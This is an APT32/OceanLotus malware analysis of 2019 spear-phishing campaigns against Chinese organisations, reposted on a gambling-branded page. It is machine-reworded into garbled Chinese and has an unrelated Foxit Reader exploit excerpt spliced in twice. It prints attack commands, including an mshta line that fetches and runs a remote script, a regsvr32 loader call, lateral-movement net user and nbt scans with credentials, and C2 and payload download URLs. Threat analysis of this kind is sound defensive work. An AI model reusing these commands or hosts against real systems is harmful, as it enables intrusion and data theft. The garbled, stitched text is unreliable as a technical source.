海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

申博_安全预警 申博 220次浏览 已收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

一、配景

“海莲花”(别名APT32、OceanLotus),被认为是来自越南的APT进击构造,自2012年活泼以来,一向针对中国的敏感目标举行进击运动,是近几年来针对中国大陆举行进击运动的最活泼的APT进击构造之一。

在2019年第一季度,腾讯御见要挟情报中心延续的检测到该构造针对中国大陆的当局、海事机构、商务局部、研究机构的进击运动。另外该构造还在赓续的更新他们的进击武器库,无论是垂纶的钓饵情势、payload的加载、横向挪动等。特别值得注意的是,我们发明该构造针对分歧的机械下发分歧的歹意模块,使得即使歹意文件被平安厂商捕捉到,也因为无相干机械特性而没法解密终究的payload,没法晓得后续的相干运动。

运动钻石模子以下:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图1

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

二、手艺剖析

1、初始进击

歹意文件投递的体式格局依然是最经常运用的鱼叉进击的体式格局,垂纶关键字包孕”干部培训”,”绩效”,”事情偏向”,”纪检监察”等,相干的邮件以下:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图2

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图3

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图4

除此该次进击还新增了敏感内容的主题,用户吸收被进击者翻开,如敏感图片:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图5

2、 钓饵范例

2019年一季度投递的歹意钓饵范例浩瀚,包孕白加黑、lnk、doc文档、带有WinRAR ACE(CVE-2018-20250)破绽的紧缩包等。

1) 白加黑

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图6

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图7

2) 歹意lnk

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图8

3) 带有宏的歹意doc文档

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图9

4) 带有WinRAR ACE(CVE-2018-20250)破绽的紧缩包:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图10

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图11

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图12

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图13

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图14

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图15

3、 歹意文件植入

1) 歹意lnk剖析

在1月的一波进击中,该构造会在一切的投递的紧缩包里,都寄存一个歹意的lnk,然则一切的lnk文件都相似(实行的地点不克不及,然则内容一致)。lnk文件的图标伪装成word图标。值得注意的是,该lnk的图标会从网络猎取,因而若是长途服务器已封闭,会致使该lnk无图标的征象。另外,还会形成即使不双击lnk,只需翻开lnk地点的目次,就会涌现网络衔接的征象。

该征象的原因是:explorer剖析lnk的时刻会去剖析图标,而这个lnk设置装备摆设的图标在网络上,因而会自动去下载,但只是下载,不会实行,看一眼不运转lnk文件的话,会走漏本身ip地点,但不会致使电脑中木马。

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图16

双击运转lnk后,会实行以下敕令:

C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html

个中, news.html现实为一个vbs剧本文件:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图17

mstha实行此剧本本后会解密剧本中存储的内容,并存储到%temp%目次下,文件名分别为:

· 7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.tmp

· 7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.exe

· 7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.log 

· 7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.env

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图18

解密算法以下所示:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图19

接着挪用体系自带的odbcconf.exe,将7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.tmp(dll文件)给加载起来。末了挪用taskkill.exe,完毕mshta.exe历程:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图20

然则奇怪的是,因为解密算法的题目,致使终究的解密失利,因而实行该lnk,用户现实并不会中招:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图21

从而我们预测该体式格局能够还处于测试阶段,或许作者因为忽视致使。不外在后续的进击运动中,我们未再次检测到该进击体式格局。

2) 带有宏的doc文档

带有宏的文档的投递,是该构造对照经常运用的歹意钓饵,如:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图22

另外,Twitter上也有很多平安同仁曝光过该构造的该体式格局的钓饵:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图23

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图24

另外疑似作者还在VT上跟相干研究员互动:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图25

固然,我们更置信该用户能够只是平安研究员之间的一个打趣。

实行宏后,起首会复制原始文档到%temp%下,命名为随机名文件:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图26

然后解密出一个新的VBA宏:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图27

接着设置注册表

”HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\AccessVBOM” 的值为1:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图28

末了翻开之前复制的doc文件,并将原始VBA宏擦除,将解密后的新的VBA宏增加进去,并启动VBA宏函数 x_N0th1ngH3r3:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图29

x_N0th1ngH3r3函数一样是解密出一段新VBA宏,一样挪用新VBA宏的x_N0th1ngH3r3函数:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图30

解密出来的新VBA宏目标是将shellcode解密并加载实行:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图31

Shellcode解密出一个DLL文件,并在内存中加载,实行DllEntry函数:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图32

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图33

DllEntry函数先会提取资本文件,并解密出来:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图34

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图35

解密出来的内容包孕终究rat和相干设置装备摆设信息:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图36

随后会将解密的rat在内存中睁开,而且查找CreateInstance函数地点,然后将设置装备摆设信息传入挪用该函数:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图37

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图38

设置装备摆设的4个C&C运用https举行通讯衔接:

· cloud.360cn.info

· dns.chinanews.network

· aliexpresscn.net

· chinaport.org

其他的手艺细节同文章同之前御见宣布的海莲花的剖析文章(见附录)

3) 白加黑

白加黑一样是该构造经常运用的钓饵范例,而且在现实进击过程当中,还屡次运用。

如,进击起首运用了word的主顺序为白文件,加载歹意文件wwlib.dll:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图39

wwlib.dll的功用是装置,开释360se.exe(白文件)、chrome_elf.dll文件到\ProgramData\360seMaintenance\目次。然后设置注册表将扩展名为doc、docx、pdf的文件默许翻开顺序设置为360se.exe:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图40

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图41

开释钓饵文档到暂时目次,并翻开:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图42

然后再次运用白加黑的手艺,运用360se的主顺序做为白文件,加载歹意的chrome_elf.dll:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图43

chrome_elf.dll功用除完成挪用原始默许顺序翻开txt、doc文件外,还会衔接网络下载下一阶段的歹意文件并在内存中直接实行:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图44

下载地点为:

· https://officewps.net/cosja.png

另外,其他的歹意样本下载地点如:

· https://dominikmagoffin.com/subi.png

· https://ristineho.com/direct.jpg

利用Foxit Reader的PDF Printer实现提权

去年年中,我在一篇文章中讲述了在Foxit Reader中挖掘UAF漏洞的过程,以及如何利用该漏洞发送远程代码执行攻击。之后,我又在一篇文章中介绍了Foxit Reader SDK ActiveX中的一个命令注入漏洞。本着不放弃不抛弃的精神,在同年晚些时候我

等。

下载的木马是一个直接可看成代码实行的shellcode,下载后直接在内存中实行:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图45

shellcode的功用是解压解密出一个功用自加载的PE文件:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图46

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图47

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图48

该PE文件是CobaltStrike木马,和之前海莲花构造运用的该木马完整一样,C2为https:// officewps.net/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图49

另外,我们还发明有对照早前的进击运动中,一样运用360的软件治理来做为白加黑的载体:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图50

该样本会读取c:\windows\system32.ini文件,读取1字节作为key:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图51

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图52

读取并解密资本icon下的1资本,获得一个字符串wsc_proxy.exe,对照以后历程是不是为wsc_proxy.exe,若是是则继承:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图53

读取本身.text区段地点,若是没读取胜利就读取safemon.dll的:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图54

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图55

读取ummrzhwp.Emf,运用一样的要领解密,完后加载:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图56

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图57

终究的shellcode为CobaltStrike,不再赘述。

4) 带有WinRAR ACE(CVE-2018-20250)破绽的紧缩包

该紧缩包解压后,会解压出有隐约图片处置惩罚的doc文档:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图58

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图59

除解压出紧缩的文件后,还会在启动目次(C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup)开释一个自解压文件:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图60

解压后会有一个{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件,然后实行敕令。

regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx实行。

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图61

该ocx的手艺细节同前面宏文档的内存dll的局部剖析,此处就不再赘述。

4、 下发文件剖析

在进击者攻下机械后,进击者还会延续的对受控机举行进击:会经由过程剧本开释新的与该机械绑定木马,此木马主要经由过程两种加载器完成只能在该机械上运转,加载器也是运用白加黑手艺,如运用googleupdate.exe+goopdate.dll,另外的名字还包孕如:

· KuGouUpdate.exe+goopdate.dll

· AdobeUpdate.exe+goopdate.dll

· Bounjour.exe+goopdate.dll

等……

1) 加载器1剖析

道理示意图以下:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图62

木马实行后分派内存空间,拷贝shellcode到新请求的空间中实行,shellcode的功用则是应用设置装备摆设暗码+当地盘算机名的hash作为密钥解密终究的playload,并对playload举行校验,胜利后建立新线程实行playload。

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图63

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图64

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图65

2) 加载器2剖析

道理图以下:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图66

加载器2是在加载器1的基础上增加了一层随机密钥的加密,更好地匹敌平安软件的检测扫描,且经由过程挂钩API函数然乱木马实行流程来滋扰自动化沙箱的剖析。

起首在dll进口点处hook LdrLoadDll函数,当挪用该API时接受实行流程实行解密代码,经由过程内置的随机暗码解密shellcode,shellcode的功用则是应用设置装备摆设暗码+当地盘算机名的hash作为密钥解密终究的playload,并对playload举行校验,胜利后建立新线程实行playload:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图67

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图68

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图69

Shellcode行动同loader1解密出的shellcode一致:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图70

运用的相干的加密前缀另有:

· AMDservice

· justletMeholdU

· 360zipfuckyou

· PJFgaJunlmzRdjx79txe

· [email protected]

· 210.72.156.203

· [email protected]

· [email protected]

· [email protected]

· GoogleCompany

……

终究的playload有三种,都是海莲花经常运用的木马,分别为CobaltStrike、Gh0st、Denis。

· RAT1:CobaltStrike

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图71

· RAT2:Gh0st改版

该木马疑似运用开源木马gh0st改版,支撑tcp、upd,数据包运用zlib紧缩。

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图72

· RAT3:Denis

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图73

5、 提权和横向挪动

另外,我们还发明海莲花还会赓续的对被进击的内网举行横向挪动,以此来渗入到更多的机械:

应用nbt.exe扫描内网网段,其能够经由过程网络凭证信息或暴力破解内网网络共享的用户和暗码,如:

· C:\\WINDOWS\\system32\\cmd.exe /C nbt.exe 192.168.1.105/24;

经由过程net user等相干敕令检察或接见内网主机,如:

net user \\192.168.1.83\C#3 /U:192.168.1.183\Administrator 123456;
NTLM hash。

另外,在上段所述的加密的前缀中,我们还发明了一个ip:210.72.156.203做为加密前缀,我们从腾讯安图查询可见:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图74

能够发明,能联系关系到nbtscan-1.0.35.exe和mmc.exe,一样跟内网渗入相干。

还渗入到内网机械后,进击者还发下发bat和js剧本,来实行后续的操纵。

剧本名字如encode.js、360se.txt、360PluginUpdater.js、360DeepScanner.js、360Tray.js等。

如:360PluginUpdater.bat+360PluginUpdater.js

360PluginUpdater.bat的功用是输出加密剧本到360PluginUpdater.dat,完成后将其重命名为360PluginUpdater.js,并实行他:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图75

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图76

360PluginUpdater.js是个加密的剧本:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图77

经由过程一系列解密后终究经由过程eval实行解密后的剧本:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图78

经由base64解密及范序列化后获得两个工具loader和playload,并在内存中挪用loader的LoadShell要领。

loader的pdb为:E:\priv\framework\code\tools\exe2js\loader\obj\Release\loader.pdb,其功用是请求内存,解密加载实行playload:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图79

payload PE头自带加载代码:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图80

终究挪用ReflectiveLoader完成内存加载dll:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图81

终究为为CobaltStrike进击平台远控:

海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘

图82

三、进击者剖析

从本次的进击者的垂纶邮件的邮件名来看,进击者均接纳了网易的免费邮箱126.com和163.com,如baixiao******@126.com、duancongrui**@163.com等。邮件名花样都接纳名字+数字的情势。名字存在肯定的中国特色。

再者,注册的C&C域名,如cloud.360cn.info、chinaport.org、dns.chinanews.network、order.dianpingsh.com等也带有显着的中国特色。

而从垂纶邮件的内容和附件来看,进击者对中国的国情和相干信息也有异常多的相识。

四、总结

海莲花构造是近年来针对中国大陆的敏感局部举行进击的最活泼的APT构造之一,它总是在赓续的进化,更新他的进击手段和武器库,以到达绕过平安软件防备的目标。如赓续的变更加载体式格局、殽杂要领、多种多样的钓饵情势等,还运用新的Nday举行进击,如该波进击中的WinRAR ACE破绽(CVE-2018-20250)。除武器库的赓续更新,该构造也相称熟习中国的状况,包孕政策、运用习气等等,这也使得疑惑相干职员,是的进击胜利增加了胜利率。

除此,该构造的进击局限也在赓续的扩展,除当局局部、海事机构、商务厅、动力单元等外,研究机构所遭遇的进击也在赓续的增加,而对小我的进击,如传授、状师的垂纶进击也在赓续的举行。

因而我们提示有关局部及有关机构的事情职员,实在进步国度平安意识,进步网络平安意识,不要被网络垂纶信息所蒙蔽,以避免给国度平安形成重大损失。

五、平安发起

1、不要翻开不明泉源的邮件附件;

2、实时打体系补钉和主要软件的补钉;

3、警惕处置惩罚Office文档,除非确认文档泉源牢靠,充足相识翻开文档的效果,不然务必不要开启Office启用宏代码;

4、运用腾讯御点防备能够的病毒木马进击;

利用Foxit Reader的PDF Printer实现提权

去年年中,我在一篇文章中讲述了在Foxit Reader中挖掘UAF漏洞的过程,以及如何利用该漏洞发送远程代码执行攻击。之后,我又在一篇文章中介绍了Foxit Reader SDK ActiveX中的一个命令注入漏洞。本着不放弃不抛弃的精神,在同年晚些时候我


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明海莲花APT构造2019年第一季度针对中国的进击运动手艺揭秘
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址